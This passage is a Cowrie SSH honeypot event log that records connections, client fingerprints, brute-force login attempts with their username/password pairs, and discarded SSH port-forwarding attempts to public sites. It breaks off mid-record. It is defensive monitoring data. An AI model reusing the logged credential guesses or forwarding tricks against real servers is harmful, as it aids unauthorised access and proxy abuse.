{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T21:09:51.576259Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:09:51.577401Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:09:51.578552Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50498,"dst_ip":"1.2.3.4","dst_port":22,"session":"627d58cc94ba","protocol":"ssh","message":"New connection: 212.227.235.229:50498 (1.2.3.4:22) [session: 627d58cc94ba]","sensor":"my-vps","timestamp":"2025-08-26T21:09:56.398961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:09:56.403839Z","src_ip":"212.227.235.229","session":"627d58cc94ba"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:09:56.658445Z","src_ip":"212.227.235.229","session":"627d58cc94ba"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.118","src_port":58992,"dst_ip":"1.2.3.4","dst_port":22,"session":"75b68eb2a468","protocol":"ssh","message":"New connection: 80.94.95.118:58992 (1.2.3.4:22) [session: 75b68eb2a468]","sensor":"my-vps","timestamp":"2025-08-26T21:09:58.351632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T21:09:58.352631Z","src_ip":"80.94.95.118","session":"75b68eb2a468"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T21:09:58.382971Z","src_ip":"80.94.95.118","session":"75b68eb2a468"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:09:58.538479Z","src_ip":"80.94.95.118","session":"75b68eb2a468"}
{"eventid":"cowrie.login.failed","username":"belkinstyle","password":"72ca06","message":"login attempt [belkinstyle/72ca06] failed","sensor":"my-vps","timestamp":"2025-08-26T21:09:58.643115Z","src_ip":"212.227.235.229","session":"627d58cc94ba"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:09:59.937823Z","src_ip":"212.227.235.229","session":"627d58cc94ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.216.40.100","dst_port":443,"src_ip":"80.94.95.118","src_port":58432,"message":"direct-tcp connection request to 54.216.40.100:443 from 127.0.0.1:58432","sensor":"my-vps","timestamp":"2025-08-26T21:10:02.253027Z","session":"75b68eb2a468"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.216.40.100","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03!V=S\\xaf\\xef\\x1a\\x99U\\xa9\\xfc\\x86\\xc9\\x93\\xe39e\\x0f\\xce\\x9d\\xca\\xdd\\x89\\xf6\\x1e\\xc3\\xce\\x16L.\\xed\\xa4 \\xfd\\x1b6\\x07\\x93\\xfbVQ\\xa9pZ\\x9f\\x94\\xf4\\xb9\\xff'\\xf3\\xfd\\x9f\\xc3+J\\x02\\xd3\\xbfW\\xf8\\x0f\\xb5%\\xa5\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x1av\\xba\\xd5\\xdf85/\\x01\\x15\\xa96\\x03q\\x94\\x0f\\x1f\\x87\\xbd\\xdb\\xdb\\x8c\\x8aN\\x11th\\x89f\\xf7b\\r\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.216.40.100:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03!V=S\\xaf\\xef\\x1a\\x99U\\xa9\\xfc\\x86\\xc9\\x93\\xe39e\\x0f\\xce\\x9d\\xca\\xdd\\x89\\xf6\\x1e\\xc3\\xce\\x16L.\\xed\\xa4 \\xfd\\x1b6\\x07\\x93\\xfbVQ\\xa9pZ\\x9f\\x94\\xf4\\xb9\\xff'\\xf3\\xfd\\x9f\\xc3+J\\x02\\xd3\\xbfW\\xf8\\x0f\\xb5%\\xa5\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x1av\\xba\\xd5\\xdf85/\\x01\\x15\\xa96\\x03q\\x94\\x0f\\x1f\\x87\\xbd\\xdb\\xdb\\x8c\\x8aN\\x11th\\x89f\\xf7b\\r\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T21:10:03.274754Z","src_ip":"80.94.95.118","session":"75b68eb2a468"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"104.79.88.166","dst_port":443,"src_ip":"80.94.95.118","src_port":59272,"message":"direct-tcp connection request to 104.79.88.166:443 from 127.0.0.1:59272","sensor":"my-vps","timestamp":"2025-08-26T21:10:04.396592Z","session":"75b68eb2a468"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"104.79.88.166","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe4O}\\x0f\\xe0{\\xdch\\xc9i~}I\\xfe\\xd7T\\xf8G\\x80\\xc5u\\xe0+\\xa9\\xd9\\x06R\\xf1o\\x91\\xec\\xe8 m[\\xd8N\\xab|r\\x0c'\\x0f\\x85\\x06)=\\xfd\\xb4-N\\xdc\\xdf\\x1c\\xa9\\x06\\te-W\\x9d\\x13\\xed\\x9a\\xa1\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x83\\xd0$\\xcad$e9?\\xd8\\xc0\\xb8\\xff\\xdext$\\x87\\xd8\\x9a\\x95\\xf8\\xd4\\xa7'D\\xdd\\xad\\xe8\\x0c\\xf8@\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 104.79.88.166:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe4O}\\x0f\\xe0{\\xdch\\xc9i~}I\\xfe\\xd7T\\xf8G\\x80\\xc5u\\xe0+\\xa9\\xd9\\x06R\\xf1o\\x91\\xec\\xe8 m[\\xd8N\\xab|r\\x0c'\\x0f\\x85\\x06)=\\xfd\\xb4-N\\xdc\\xdf\\x1c\\xa9\\x06\\te-W\\x9d\\x13\\xed\\x9a\\xa1\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x83\\xd0$\\xcad$e9?\\xd8\\xc0\\xb8\\xff\\xdext$\\x87\\xd8\\x9a\\x95\\xf8\\xd4\\xa7'D\\xdd\\xad\\xe8\\x0c\\xf8@\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T21:10:05.268965Z","src_ip":"80.94.95.118","session":"75b68eb2a468"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.208.164","dst_port":443,"src_ip":"80.94.95.118","src_port":59862,"message":"direct-tcp connection request to 142.251.208.164:443 from 127.0.0.1:59862","sensor":"my-vps","timestamp":"2025-08-26T21:10:05.723580Z","session":"75b68eb2a468"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.208.164","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x1c\\nJ\\x15\\xcd\\xfd,\\x15}\\xe6\\x90\\xab\\xab2\\xef*km\\xe7\\xa0\\xa2\\xed\\x9d\\xa9\\xa9\\xff\\xb3\\xf0\\xdf\\xfe\\x0b\\xaf \\x04\\xdc]\\xc4.\\x98\\xe0\\xdbJv\\x98\\x9d\\xdd\\xc6\\xea]\\xb8\\x98*\\x1d\\x11^C\\xf4\\x92~\\xa6\\xff\\xd7\\x10\\x9f\\xe0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xb2\\xb62\\xb8L\\xaf\\xb3\\x8e\\x12\\x1c\\xbe\\x86\\xaf\\xe3h\\xd5D0\\xd8\\x94f\\xf0\\x98\\xdfz3%b\\xea\\x0b<\\x0e\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x